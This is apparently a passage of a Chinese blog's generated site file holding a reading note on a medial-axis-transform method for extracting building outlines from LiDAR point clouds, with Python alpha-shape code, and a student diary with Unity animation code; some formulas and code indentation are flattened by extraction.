    ​ 这段代码首先生成 200 个随机的 2D 点,然后调用 boundary_extract 函数从中提取出边界,并将 alpha 参数设置为 6,计算误差 err 为 10e-5。然后使用提取的边界和圆心,以及 points 数组调用 show_edge 函数进行展示。

    ]]>
    + 资源

    原文

    Abstract

    ​ 由于建筑物出现的多样性和复杂性,从城市环境的机载激光雷达点云数据中自动提取和描绘建筑物仍然是一项具有挑战性的任务。中轴变换(MAT)能够描述对象的几何形状和拓扑结构,但从未应用于建筑屋顶轮廓提取。它通过对象的中心线或骨架结构而不是边界来表示对象的形状。

    ​ 我们提出了一种稳定的、基于 MAT 的方法来检测建筑 corner point,然后将这些 corner point 连接起来形成建筑边界多边形。

    • 首先,我们对通过 alpha-shape 算法获取的一组建筑边缘点的 2D MAT 进行近似,以导出所谓的建筑屋顶骨架 (building roof skeleton)。
    • 然后,我们提出了一种分层的 corner point 感知分割方法,根据骨架点的特性,即所谓的分离角、最大内切圆的半径和定义边缘点索引,对骨架点进行聚类。
    • 从每个片段,通过基于片段内的骨架点位置外推零半径内切圆的位置来估计 corner point。

    ​ 结果表明,骨架化 (skeletonization) 是一种很有前途的工具,可以从远非完美的地理点云数据中提取建筑物轮廓的相关几何信息。

    1. Introduction

    ​ 绘制建筑屋顶轮廓,也称为建筑足迹,对于数字基础地图制图、规划、监控、基础设施管理和可持续城市设计至关重要。

    ​ 人造城市物体(建筑物、道路、运河)通常具有对称的形状,具有直线和锐角。这样的特性使得能够从 ALS 点云中自动提取边界轮廓。

    png

    MAT 骨架(蓝线)直观地检测位于骨架和对象边界(黑线)相交处的角点(红点)。

    ​ **中轴变换(MAT)**是一种强大的形状提取技术,它提供了紧凑的几何表示,同时保留了输入形状的拓扑特性。MAT 由 Blum 引入,用于描述生物形状。好家伙 1967 年的……然而,MAT 有一个根本的缺点,那就是它对输入形状的小扰动的不稳定性,这可能会干扰 MAT 分支的拓扑。

    ​ 角是重要的局部特征,关于其位置的知识可以最大限度地减少进一步的数据处理,而不会丢失原始物体形状的特定特征。在给定城市地区的空中点云的情况下,我们提出了一种基于 MAT 描述符的精确屋顶角点自动提取建筑轮廓的方法。

    ​ 随着人们对 GIS(地理信息系统)数字地图产品的兴趣增加,从各种遥感数据中提取建筑轮廓的开发工作也得到了加强。

    ​ 文献中发现的 MAT 或骨架的各种定义对应于计算 MAT 的不同方法,导致具有不同性质的不同结果。通常,MAT 算法通常侧重于推导表面中心线或中轴的几何位置,即所谓的骨架化。到目前为止,文献中有许多骨架化方法及其在二维和三维物体描述中的应用。现有的骨架化方法通常分为四种主要方法:

    • 基于形态学细化的方法
    • 使用平面形状的中轴变换的基于几何的方法
    • 基于距离的函数
    • 由函数而不是使用距离函数生成的一般场函数

    ​ Ma 等人使用基于最近邻居和法线的收缩球方法估计 3D 中轴点,收缩球算法不仅准确且计算高效,而且被认为是现有最简单、最快速的曲面骨架化方法。

    3. Methodology

    ​ 我们的研究重点是 MAT 的自适应,用于从地图和空间建模所需的噪声点云数据中提取建筑轮廓。我们扩展了迭代收缩球算法的工作,并开发了一种利用骨架特征的策略,以实现精确提取建筑轮廓的目标。

    ​ 本文还提出了一种新的骨骼点分割方法。所提出的方法在处理有噪声的表面边界和重建建筑轮廓方面达到了最先进的水平。通过优化基于骨架的特征的使用,它需要最少的人机交互。具体而言,我们的工作贡献如下:

    • 我们集成了骨架衍生特征和全局特征,以执行处理不同点密度和噪声水平的鲁棒骨架点(MAT)分割。
    • 我们结合有序的表面点索引和骨骼衍生特征来检测角点。
    • 我们介绍了使用骨骼衍生特征来准确估计建筑拐角位置。

    png

    提出的提取建筑轮廓的方法学工作流程

    ​ 由于本研究需要在二维空间中使用 MAT,我们采用了 Ma 等人的二维收缩圆算法。我们提出的自动提取建筑屋顶轮廓的方法的一般工作流程由下面的主要步骤组成。

    • (b),通过 alpha-shape 算法提取建筑物边界点。
    • (c),使用 2D 收缩圆算法将边界点转换为其 2D MAT 或骨架点。
    • (d),我们应用我们的 MAT 分割,通过利用它们的几何属性来分割 MAT 点。
    • (e),使用这些线段来检测角点
    • (f ),基于检测到的角点进行多边形化,形成二维闭合多段线。

    png

    矩形骨架(蓝线)及其相应的内切圆(灰色)和中轴点 c(红色点)。

    ​ 本研究使用了扩展收缩圆方法,该方法实现了 Peters 提出的去噪启发式方法。我们将物体表面 $\mathbf S$ 的骨架定义为 $\mathbf S$ 中最大内切圆 $B(c,\rho )$ 的一组中心点 $c$,其中 $\rho$ 表示该圆的半径。

    ​ 2D 骨架点也称为中轴点。通过将圆半径 $\rho$ 函数与中轴点集相关联,我们获得了所谓的中轴变换(MAT)。

    ​ 如上图所示:

    • 中轴点(红色点)形成矩形对象 $\mathbf S$ 的 MAT 骨架(蓝色线)。
    • 每个最大内切圆(灰色)至少接触 $\mathbf S$(黑色轮廓)边界的两个点。
    • 任何非最大圆或未内切于 $\mathbf S$(绿色圆)的圆心都将被忽略,不被视为中轴点。

    3.1 Alpha-shape

    给定分割的建筑点,创建建筑轮廓从 Edelsbruner 引入的 alpha-shape 算法的边界点选择开始。众所周知,alpha-shape 能够以所需的细节水平保留有限点集的小形状细节。2D alpha 形状是基于输入点的 2D Delaunay 三角测量构建的。该方法识别根据参数 $\alpha\ge 0$ 定义的边界点,该参数控制边界形状的细节级别。给定平面上的一组点 $S$ 和 $\alpha$ 的值,该算法的工作原理如下:

    1. 计算 $S$ 的 Delaunay 三角剖分 $DT(S)$。$DT(S)$中的所有边都是 alpha 形状 $S_\alpha$ 的候选边。

    2. 对于具有端点 $p$ 和 $q$ 的 $DT(S)$ 的所有边 $e$:

      a. 找到半径为 $\alpha$ 的两个圆 $B_{pq1}$ 和 $B_{pq2}$,其中心 $c_{pq}(1)$ 和 $c_{pq}(2)$ 包含相同边 $e$ 的端点 $p$ 和点 $q$。这些圆根据以下圆心定义:

      $c_{pq}(1,2)=\left(\frac{x_p+x_q}{2}\pm\sqrt{\alpha2-\left(\frac{||e||}{2}\right)2}\left(\frac{y_p-y_q}{2}\right),\frac{y_p+y_q}{2}\pm\sqrt{\alpha2-\left(\frac{||e||}{2}\right)2}(\frac{x_p-x_q}{2}) \right)$

      其中 $||e||$ 是端点 $p$ 和 $q$ 之间的长度。

      b. 如果至少有一个圆的内部不包含来自 $S$ 的点,则 $e$ 是有效的边界边,

      png

      否则该边将被删除。

      png

      1. 所有有效边界边的并集形成 $\alpha$ 形状 $S_\alpha$

        png

    ​ $\alpha$ 的值是一个实数,$0\le \alpha\le\infty$。当 $\alpha$ 接近 $0$ 时,形状可能会收缩,形成孔洞,并可能变得不连续。在极端情况下,$\alpha=0$ 的值会导致数据点本身。当 $\alpha$ 向无穷大增加时,$\alpha$ 形状接近点集 $S$ 的凸包。

    ​ 在我们的研究领域,我们根据经验决定 $\alpha$ 值介于 $0.3$ 和 $0.5$。

    3.2. The shrinking circle principles

    ​ 给定曲面 $S$ 上具有相应法向量 $N$ 的一组噪声边点 $V$。MAT 点被定义为 $S$ 中与边界 $S$ 相切的最大内切圆 $\mathbf B(c, \rho)$ 的中心 $c$ 和相应半径 $\rho$ 的集合。圆 $\mathbf B$ 和相应圆心 $c$ 分别表示为中间圆和中间轴点。

    png

    缩圆算法应用于有噪声建筑边缘的基本原理。

    缩圆法的基本原理如下:

    1. 中间圆在至少两个点 $(p,q)$ 上接触表面,其中 $p,q\in \mathbf S$。

    2. 沿着由边点 $p$ 的法向量 $N_p$ 定义的线,圆 $\mathbf B_p$ 的半径 $\rho$ 迭代减小,直到 $\mathbf B_p$ 在 $q$ 处接触 $\mathbf S$,其中 $q\ne p$,圆心 $c$ 在通过 $N_p$ 的线上。如果找到最大 $\mathbf B_p$ 圆,则迭代停止。

    3. 中间圆是一个最大的空圆,这意味着它不包含任何表面点。

    3.3. Skeletal points extraction

    ​ 为了获得表面 $\mathbf S$ 的 MAT,计算中轴点 $c(p)$。因此,通过以下步骤计算 $\mathbf S$ 中所有采样点 $p$ 的最大内切圆 $\mathbf B$:

    1. $p$ 的初始圆 $\mathbf B_{init}$ 是基于初始半径 $\rho_{init}$ 定义的。$\rho_{init}$ 值设置得足够大,例如等于两个输入点之间的最大距离。

    2. 给定 $\rho^{\mathbf k}{\mathbf p}$,其中 $k={1,2,…,i}$ 表示第 $k$ 个迭代步骤,圆心 $\mathbf c^{\mathbf k}{\mathbf p}$ 由下式给出:

      $c^{\mathbf k}{\mathbf p}=\mathbf p-\mathbf N{\mathbf p}\rho^{\mathbf k}_{\mathbf p}$

    3. 找到最接近 $c^{\mathbf k}{\mathbf p}$ 的曲面点 $q^\mathbf k\mathbf p\in S$,使得 $q^{\mathbf k}_{\mathbf p}\ne p$

    4. $q^{\mathbf k}_{\mathbf p}$ 和 $p$ 定义的圆的圆最大值测试:

      a. 如果从 $c^{\mathbf k}{\mathbf p}$ 到 $q^{\mathbf k}{\mathbf p}$ 的距离等于圆的半径 $\rho^{\mathbf k}{\mathbf p}$,则圆 $\mathbf B^{\mathbf k}{\mathbf p}$ 最大,并且$c^{\mathbf k}_{\mathbf p}$ 是中轴点。

      b. 否则,使用以下方程计算下一个收缩圆的半径 $\rho^{\mathbf k+1}_{\mathbf p}$:

      $\rho^{\mathbf k+1}{\mathbf p}=\frac{d(p,q{k+1})}{2\cos\theta{k+1}{p}}$

      其中:

      $\cos\theta{k+1}_p=\frac{N(p-q{k+1})}{d(p, q^{k+1})}$

    png

    ​ 当找到步骤 (a) 中描述的中轴点时,迭代将停止。

    ​ (a) 显示了在点 $p$ 处接触 $S$ 的圆的连续收缩,这在最后一次迭代中产生了中间圆 $B^i_p$ 和中间轴点 $c^i_p$。

    ​ 给定一个定义的内表面和外表面 $S$,MAT 由两个组成部分组成:

    • 一部分内表面 $\mathbf S(N_p)$,由所谓的内中轴点组成
    • 另一部分外表面 $\mathbf S(-N_p)$,外中轴点。

    ​ 对于每个 $p\in\mathbf S$,通过迭代步骤 2 到 4 来计算相应的内部和外部 MAT 点。向内法线 $N_p$ 用于内部 MAT 计算,而向外法线 $–N_p$ 用于外部 MAT 计算。

    1. $\cos\theta{k+1}_p=\frac{N(p-q{k+1})}{d(p, q^{k+1})}$

    png

    ​ 图 (b) 显示了用于计算内圈(黑色箭头)和外圈(红色箭头)的中轴点 $c_p$ 和法向矢量 $N_p$ 的方向的几何结构。

    ​ 噪声处理是克服 MAT 对噪声边界的敏感性的重要步骤。在输入表面上存在小凸起或噪声的情况下,圆可能收缩过多,从而可能导致不期望的中轴点。这种过度收缩的圆通常具有较小的分离角 $\alpha$。分离角 $\alpha$(见 b)是线 $p-\mathbf c_{\mathbf p}$(连接点 $p$ 和中轴点 $\mathbf c_p$ 的线)和线 $q-\mathbf c_\mathbf p$(连接点 $q$ 和中轴点 $\mathbf c_\mathbf p$ 的线)之间的角度。

    $ \cos $ $ \alpha $ = $ \frac {\overrightarrow {c_ {p}p}.\overrightarrow {c_ {p}q}}{|\overrightarrow {c_ {p}p|}\cdot |\overrightarrow {c_ {p}}q|} $

    ​ 在上述收缩方法期间。好圆被定义为收缩方法中分离角 $\alpha_k$ 大于分离角阈值 $\alpha_{min}$ 的最后一个圆。

    ​ 在这一步骤之后,每个中轴点 $\mathbf c_{\mathbf p}$ 都具有许多属性。每个 MAT 点 $\mathbf m_{\mathbf p}$ 的属性是中轴点 $c_p$、半径 $\rho$、分离角 $\alpha$、表面点 $p$ 和 $q$ 的索引以及法向量 $N_p$ 或 $-N_p$。从理论上讲,使用这些 MAT 属性,可以完全重建 $\mathbf S$ 的几何。

    3.4. MAT point segmentation

    ​ MAT 属性提供了丰富的信息,可用于将 MAT 点分组为不同的内侧段或分支。

    ​ 为了进一步应用 MAT,识别 MAT 点连通性的两个有用观察结果如下:

    • 朝向同一转折点或拐角的 MAT 点被视为一个线段。下图中正方形 $\mathbf S$ 的精细采样表面点。产生精细 MAT 点,其中一些 MAT 点逐渐接近特定转折点。从这个意义上说,从最大内切圆创建的每个 MAT 点,在表面点 $p$ 和 $q$ 处接触,指定一个转折点,该转折点位于表面点 $p$ 与 $q$ 之间。如 (b) 所示,两个表面点 $p$、$q$(红色文本)的中值与角的索引(76)相似。

    png

    • MAT 点的分离角 $\alpha$ 预计接近 $90^\circ$。如 (c) 所示,矩形的 MAT 点具有分布在 $90^\circ$ 左右的分离角。

    png

    ​ 在实践中,表面点不是完美分布的、无噪声的,不像下图所示那样规则。(a) 表面边界上的小扰动会产生所谓的骨架噪声。在检测形状角点时,骨骼噪声可能会引起虚假片段,从而导致虚假角点。

    png

    ​ 我们的分割标准依赖于边界点的转折点位置的接近度。直观地,彼此靠近并且具有相似特征值的 MAT 点被分组在一起。此外,我们预计半径 $\rho$ 将沿着线段分支逐渐变化。

    ​ 基于上述观察,我们使用三个全局阈值和四个 MAT 衍生特征来分割 MAT 点。全局阈值与 MAT 无关,定义全局阈值是为了提高分割精度。全局阈值为:

    • G.1. 距离物体表面 $\mathbf S$ 的缓冲区距离 $bf$。只有位于指定缓冲区内的 MAT 点才会被考虑用于分割。该阈值用于排除由具有向外法线的两个边缘点的最大圆产生的不可用的外部 MAT 点。这些 MAT 点是远离曲面点的典型噪声。

    • G.2. 每个线段的最小点数 minPts。任何点少于给定 minPts 的线段都被视为线段噪声。

    • 点索引间隔 $\Delta pt$ 设置两个候选角点之间的最小距离:$\Delta pt\ge \frac{l}{r}-2$

      • $l$ 是所需的最小边缘长度。
      • $r$ 是点云间隔。
      • 点索引间隔 $\Delta pt$ 准则是为了避免在短边界和噪声边界的情况下,在确定的最小边长处出现虚假或额外的角。

      例如,给定一组具有 $0.5m$ 点云间隔 $r$ 的点,我们需要提取最小长度 $l=2.5m$ 的建筑边缘,因此,$\Delta pt$ 设置为 $3$。

      想象一下,下图中的点 13 与点 11、16 和 20 具有相同的中间性质。点 13 将不被视为角点,因为它与点 11 的点差小于 3。

    png

    噪声点边缘可能指示错误的拐角。

    ​ 从 MAT 属性派生的自定义特征或 MAT 派生的特征描述如下:

    • F.1. 考虑分离角 $\alpha$ 接近 $90^\circ$ 的 MAT 点 $\mathbf m_{\mathbf p}$ 进行分割。这里的“闭合”由分离角差值阈值 $\partial \alpha$ 指定。给定的 $\partial \alpha$ 阈值之外的 MAT 点被视为骨架噪声。这意味着,如果 MAT 点 $\mathbf m_{\mathbf p}$ 的分离角 $α_\mathbf p$ 在 $90^\circ + \partial \alpha$ 和 $90^\circ - \partial \alpha$ 之间,则将考虑对其进行分割。

    • F.2. 每个边点 $p\in\mathbf S$ 都被赋予一个唯一的索引。对于角点感知分割,期望具有相似特征的 MAT 点 $\mathbf m_{\mathbf p}$ 属于同一聚类。

      $med_{pq}=p_{idx}+\frac{q_{idx}-p_{idx}}{2}$

      例如,上图中的 $p_{idx}=13$ 和 $q_{idx}=19$ 导致 $med_{pq}=16$。具有相似 $med_{pq}$ 值的不同 MAT 点可能属于同一 MAT 段。

    • F.3. 点 $p_i$ 的法线与上一点 $p_{i−1}$ 的法线和下一点 $p_{i+1}$ 的法线之间的法线角差 $\delta N$分别由($|N_p−N_{p_{i−1}}|$)和($|N_p−N_{p_{i+1}}|$)定义。

    • F.4. 最大中位指数差值阈值 $\partial K_p$。此功能用于避免由于曲面上的扰动或噪声(特别是在拐角附近)而导致的伪拐角和附加分段。

    ​ 给定一组 MAT 点 $M={(c_p,\rho,\alpha,p,q,N)}$,每个中轴点 $c_p$ 具有 6 个特征 $\rho,\alpha,p,q,N$,MAT 点分割工作如下:

    1. 使用全局阈值 G.1 选择位于距离物体表面 $\mathbf S$ $bf$ 的特定缓冲距离内的 MAT 点 $m_\mathbf p$。

    2. 仅选择 MAT 衍生特征 F.1 指定的具有可接受分离角 $\mathbf \alpha_p$ 的 MAT 点 $\mathbf m_{\mathbf p}$。

    3. 使用 MAT 导出的特征 F.2 计算来自步骤 2 的滤波 MAT 点的中值$med_{pq}$。

    4. 识别所有可能的候选角 $K_r$ 并将它们放在列表 $K_1、K_2…$ 中。

    5. 给定来自步骤 3 的候选角 $K_r$,该算法搜索中值与 $r_{idx}$ 相似的 MAT 点。

    6. 如果 $|med_{pq}−r_{idx}|≤\Delta pt$,则 MAT 点 $\mathbf m_\mathbf p$被分配给中间段$\mathbf{Mseg}®$。

    7. 如 G.2 中所定义,任何成员点少于 $minPts$ 的内侧节段 $\mathbf{Mseg}$ 都将被移除。该步骤将消除边缘出现缺陷时可能形成的假线段。

    ​ 接下来使用内侧段来估计真实的角,其中一个内侧段对应于一个角。

    3.5. Corner point estimation

    ​ 我们不是将边缘点指定为角,而是基于中轴点的位置及其相应的半径来估计角的位置。MAT 点的最大内切圆的半径 $\rho$ 将朝着拐角逐渐减小。

    3.6. Building outline evaluation metrics

    ​ 应用两种不同的评估指标来评估所提出的工作流在满足要求方面的性能。

    ​ 建筑外形规格:转角几何精度和转角检测精度。

    ​ 位置精度,也称为几何位置精度或位置精度,用作测量建筑物多边形在绝对地理参考系统中相对于其真实位置的定位情况的主要指标。

    ​ 我们使用 RMSE(均方根误差)来测量参考和结果中建筑转角位置(X 和 Y 坐标)之间的平方差的平均值。针对所有检测到的建筑转角,计算完整建筑相对于相应参考转角位置的 RMSE。

    $$RMSE_x=\frac{\sqrt{\Sigma(X_{res}-X_{ref})^2}}{n}$$

    $$RMSE_y=\frac{\sqrt{\Sigma(Y_{res}-Y_{ref})^2}}{n}$$

    $$RMSE_r=\sqrt{RMSEx2+RMSEy2}$$

    $X_{res}$,$Y_{res}=$ 得到的角点坐标

    $X_{ref}$, $Y_{ref}=$ 地面实况中角点的坐标

    $n=$ 角点总数

    ​ 由于某些建筑的复杂性,并不是所有的角落都能被完全检测到。因此,我们通过三种检索测量来评估拐角检测的准确性:召回率、精确度和 F1 分数。精确性用于衡量准确性或保真度,而回忆则用于衡量完整性。F1 分数是精确度和召回率的加权平均值。

    $$Perception = \frac{TP}{TP+FP}$$

    $$Recall=\frac{TP}{TP+FN}$$

    $$F1-score=\frac{2\cdot Percision\cdot Recall}{Percision+Recall}$$

    png

    ​ 在上图中的建筑多边形中,正确角的数量($TP$)为 4,而错误角的数量$FP$(绿色椭圆内)为 1,未检测到的角或偏移超过一米的角的数量 $FN$(如蓝色圆圈所示)为 2。

    该配置的 $P=0.8$,$R=0.67$,$F1=0.73$。

    png

    4. Results and discussions

    4.1. Experiments of the study areas

    ​ 在实验中,我们使用了三个具有不同景观特征和机载激光雷达点云规范的研究区域。

    4.2. General overview

    png

    4.3. Comparison analysis

    png

    4.4. Computational and complexity analysis

    ​ 分析时间复杂度。

    5. Conclusions and recommendations

    Alpha Shape 算法

    1
    2
    3
    4
    5
    import numpy as np
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D
    from scipy.spatial import Delaunay
    from sklearn.neighbors import KDTree
    1
    2
    3
    4
    5
    6
    7
    def plot_circle(centers, rs, ax):
    N = centers.shape[0]
    for i in range(N):
    theta = np.arange(0, 2 * np.pi, 0.01)
    x = centers[i,0] + rs[i] * np.cos(theta)
    y = centers[i,1] + rs[i] * np.sin(theta)
    ax.plot(x, y, 'b-', alpha=0.1)

    ​ 函数 plot_circle 用于绘制圆形。

    ​ 它接受三个参数:centers 表示圆心的坐标,rs 表示圆的半径,ax 为 matplotlib 中的 Axes 对象,用于绘图。

    • 代码首先获取 centers 数组的形状,确定要绘制多少个圆。然后通过 for 循环遍历所有圆心。

    • 在每次循环中,

      • 首先使用 np.arange 生成一个从 0 到 2π 的 theta 数组,步长为 0.01。这个数组表示圆的角度。
      • 然后根据圆的参数计算出每个角度对应的 x 和 y 坐标。具体来说,
        • x 坐标是圆心的 x 坐标加上半径乘以角度的余弦值,
        • y 坐标是圆心的 y 坐标加上半径乘以角度的正弦值。

    ​ 最后使用 ax.plot 绘制出这些点,连接成一个圆形曲线。参数 ‘b-’ 表示蓝色实线,alpha=0.1 表示透明度为 0.1。

    ​ 这样,通过不同的圆心和半径,可以在图像上绘制出多个圆形。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    def edge_check_vaild(e, tree, r, err):
    xp = e[0]
    xq = e[1]
    L = np.sqrt(np.dot(xq-xp, xq-xp))
    if L > 2 * r:
    return False, -1
    vec = (xq-xp) / L # the vector from p to q
    normal = np.array([vec[1],-vec[0]])
    c1 = (xp + xq) / 2 + normal * np.sqrt(r**2-(L/2)**2)
    c2 = (xp + xq) / 2 - normal * np.sqrt(r**2-(L/2)**2)
    c = np.array([c1,c2])
    count = tree.query_radius(c, r=r+err, return_distance=False, count_only=True, sort_results=False)
    if count[0] <= 2:
    return True, c[0]
    elif count[1] <= 2:
    return True, c[1]
    else:
    return False, -1

    ​ 函数 edge_check_vaild 用于检查边缘是否合法,也就是检查连接两点的线段是否符合圆的半径要求。

    ​ 它接受四个参数:e 表示边、tree 表示点云的 KDTree,r 表示圆的半径,err 表示检查误差。

    • 代码首先提取出两个端点的坐标 xp 和 xq,然后计算出边的长度 L。如果 L 大于 2r,那么这条边一定无法构成圆形,因此直接返回 False。
    • 如果 L 小于等于 2r,那么说明这条边有可能是圆的一部分。可以根据端点的坐标计算出连接它们的单位向量 vec,以及垂直于该向量的法向量 normal。然后通过中垂线的方程,求得圆心 c1 和 c2。
    • 接下来,使用 KDTree 的 query_radius 方法,查询以 c1 和 c2 为圆心,半径为 r+err 的圆内有多少个点。
      • 如果点的数量小于等于 2,那么说明这是一个有效的边缘。返回 True 以及圆心的坐标 c1 或 c2(视情况而定)。
      • 如果点的数量大于 2,则说明这个圆不是有效的圆,因为至少包含了三个点。返回 False 和 -1 表示无效边缘。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    def boundary_extract(points, alpha, err=10e-3):
    """
    Here, parameter err was place, because there are errors when calculating distance
    meanwhile, this err was different for different scaling 2D point cloud
    so, a parameter was placed here to considering the calculation errors
    """
    R = 1 / alpha
    pts = np.copy(points)
    tree = KDTree(pts, leaf_size=2)
    tri = Delaunay(pts)
    s = tri.simplices
    N = s.shape[0]
    i = 0
    edges = []
    centers = []
    while i <= N - 1:
    if s[i,0]==-1:
    i = i + 1
    continue
    p3 = s[i]
    e1 = np.array([points[p3[0],:], points[p3[1],:]])
    e2 = np.array([points[p3[1],:], points[p3[2],:]])
    e3 = np.array([points[p3[0],:], points[p3[2],:]])
    e = [e1,e2,e3]
    for j in range(3):
    flag, center = edge_check_vaild(e[j], tree, R, err)
    if flag:
    edges.append(e[j])
    centers.append(center)
    nb = tri.neighbors[i]
    nb_valid = nb[nb!=-1]
    i = i + 1
    return edges, centers

    ​ 函数 boundary_extract 用于从 2D 点云中提取边界。它接受三个参数:points 表示点的坐标数组,alpha 表示半径与平均边长比值的倒数,err 表示计算误差。

    • 首先根据给定的点云数据构建 KDTree 和 Delaunay 三角剖分。然后遍历每个三角形,对于三角形的每条边,调用 edge_check_valid 函数检查它是否符合圆形要求,并将符合要求的边缘和圆心加入到 edges 和 centers 列表中。
    • 最后返回边缘列表和圆心列表。

    ​ 需要注意的是,这里的 err 参数是因为计算距离时可能存在误差。实际上,在某些情况下,由于计算精度问题,同样的点云数据、相同的参数 alpha 可能会得到不同的结果。因此,如果发现提取边界的结果与预期不符,可以尝试调整 err 参数或重新生成点云数据。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    def show_edge(edges, points, circle=None, r=None):
    fig = plt.figure()
    ax = fig.add_subplot(111)
    ax.scatter(*zip(*points), s=4, c='k')
    for i in range(len(edges)):
    ax.plot(*zip(*edges[i]), '-r')
    if circle is not None:
    plot_circle(circle, r, ax)
    plt.show()

    ​ 函数 show_edge 用于可视化提取的边缘。它接受四个参数:edges 表示边缘列表,points 表示点的坐标数组,circle 表示圆心坐标,r 表示圆的半径。

    ​ 函数首先创建一个新的图表,并使用 scatter 方法绘制出点云。然后遍历边缘列表,使用 plot 方法绘制出边缘。如果指定了圆心坐标和半径,调用 plot_circle 函数将圆形绘制出来。

    ​ 最后使用 show 方法展示图表。

    1
    2
    3
    4
    5
    if __name__ == "__main__":
    pts = np.random.rand(200, 2) # 随机生成 10 个 2 维点
    alpha = 6
    edges, centers = boundary_extract(pts,alpha, err=10e-5)
    show_edge(edges,pts,circle=np.array(centers), r=np.ones(len(centers)) / alpha)

    ​ 这段代码首先生成 200 个随机的 2D 点,然后调用 boundary_extract 函数从中提取出边界,并将 alpha 参数设置为 6,计算误差 err 为 10e-5。然后使用提取的边界和圆心,以及 points 数组调用 show_edge 函数进行展示。

    ]]>
    @@ -4708,7 +4708,7 @@ /posts/Exercise-%E5%AE%9E%E9%AA%8C%E7%9B%B8%E5%85%B3/ -
    ]]>
    +
    ]]>
    @@ -4770,7 +4770,7 @@ /posts/Diary-2-%E4%B8%AD%E7%A7%8B%E4%B8%8E%E5%9B%BD%E5%BA%86/ - 前言
            

    不知道开场白写啥好就随便乱写吧

    jpg

    9.18-10.1

    ​ 14 天中有 7 天里天是灰蒙蒙的……


    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [20, 12, 12, 14, 16, 15, 12, 15, 15, 12, 15, 10, 8, 8] # 当日最低温
    y2 = [31, 24, 26, 28, 28, 26, 21, 25, 26, 25, 26, 28, 26, 26] # 当日最高温
    y3 = [59, 60, 59, 61, 63, 53, 38, 50, 65, 124, 44, 72, 28, 42] # 当日 PM 值

    png

    正文

    9.21

    尊敬的各位领导、老师,亲爱的 2023 级新生、其他年级的同学们:
    ​ 新同学、新学期、新气象、新梦想
    ​ 河北大学网络空间安全与计算机学院研究生会、河北大学网络空间安全与计算机学院学生会诚邀大家参加“2023 年河北大学网络空间安全与计算机学院迎新晚会”。
    ​ 晚会时间:2023 年 9 月 21 日 19:00 - 21:00
    ​ 晚会地点:河北大学七一路校区邯郸音乐厅
    ​ 河北大学网络空间安全与计算机学院研究生会
    ​ 河北大学网络空间安全与计算机学院学生会

    ​ 要开始迎新晚会了🤔。一开始不太想去,后来觉得还是蛮去看看吧。

    png

    迎新晚会

    ​ 于是乎强行拽着舍友陪我去看了看,在看完班上同学的表演后觉得天色有点晚了就润了。比较喜欢的是其中的相声节目,声音听起来挺有河北风味的。

    9.22

    为进一步活跃学术氛围,加强高层次学术交流,提高我院师生科学研究素养,学院特邀陕西师范大学杨波教授,中国电子科技集团张文政研究员来我院进行学术报告。
    一、报告时间:2023 年 09 月 22 日 8:30-11:00
    二、报告地点:河北大学新校区 C1-535
    @所有人 8:15 入场签到


    @全体成员 咱们学院本周六要承办第十七届中国网络空间安全学科专业建设与人才培养研讨会,全体同学都要参加本次学科会议。本次学科会议邀请了沈昌祥院士和国内多所著名高校的院长作报告,上午在图书馆一楼报告厅,下午在图书馆二楼(209 和 211)。上午 8 点 15 分入场完毕,下午 1 点 40 分入场完毕。

    有几点注意事项:
    1、参加会议时注意会场纪律,不要交头接耳,不要接打电话,不要大声喧哗,不要随意走动。
    2、提前入场,手机静音,保持良好的秩序。
    3、着装整齐,不要穿拖鞋。
    4、开会时不要玩游戏。
    5、中场休息时,会场外设置有茶歇,建议大家礼貌谦让,专家领用后,同学们可以酌情领取。
    6、参会专家学者来自国内知名高校,同学们要体现良好的校风校貌,言行举止得体有礼,具备研究生应有的高素质面貌。


    ​ 又是撑场子大会,还要连着好几场……就当没看见嘻嘻嘻。


    ​ 这段时间河北气温转凉,估计又喜提感冒了😅,倒也没有其它的不舒服,后面就是一直鼻涕一直痰。今年第四次了,习惯了。然后就喜提今年第四瓶强力枇杷露。


    ​ 晚上又是组会,~~听伟哥吹牛逼~~好像也没啥好记录的。

    ​ 然后下次就要轮到自己汇报了。因为伟哥打算回家的缘故,组会挪到了下周一。

    ​ 这个时候大家都开始为准备国庆放假回家买票了,第一次在外面读书却还没有假期中途回家的想法,更没有提前看票的意识了。

    9.25

    伟哥😍😍😍
    生日快乐
    哈哈哈快乐快乐

    gif

    挂伟哥

    ​ 组会汇报前特意学了 Unity 的 DoTween 插件写了个动画挂伟哥😈,引得师门都哄笑起来:326 里充满了快活的空气。

    挂伟哥动画代码
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;
    using Unity.VisualScripting;

    public class ChangeColor : MonoBehaviour
    {
    [SerializeField] private bool isImage = true;
    private Image image;
    private Text text;
    // Start is called before the first frame update
    void Start()
    {
    if (isImage)
    {
    image = GetComponent<Image>();
    float H, S, V;
    Color.RGBToHSV(image.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    else
    {
    text = GetComponent<Text>();
    float H, S, V;
    Color.RGBToHSV(text.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    }

    private void changeColor(float H, float S, float V)
    {
    float newH = H + 0.01f;
    if (newH > 1)
    {
    newH = 0;
    }
    Tweener tweener = null;
    if (isImage)
    {
    tweener = image.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
    else
    {
    tweener = text.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
    tweener.OnComplete(()=> changeColor(newH, S, V));
    }
    }

    ​ 但是汇报完自己的工作后,导师觉得我所做的东西技术含量不太够,不好水一篇论文。又跟导师师兄一番唇枪舌剑,最后讲得自己满身汗,回去又洗了一次澡,喜提一日两洗。

    不知道在这里多少次我因为这个问题而内耗了,觉得自己所做的东西都是空中楼阁,没有什么实际意义,在这个实验室里也缺乏足够的指导和资源,绝大多数都要靠自己。一方面觉得咬咬牙硬着头皮就水过去了,一方面又觉得这真的值得吗?唉。正如师兄所说,这坨憋不出来的小论文像一把达摩克利斯之剑一样悬在头顶。

    ​ 伟哥因为买不到回河北的票,又把之前的票都退了,他是真不想家啊,牛逼。

    9.27

    jpg

    空气质量感人

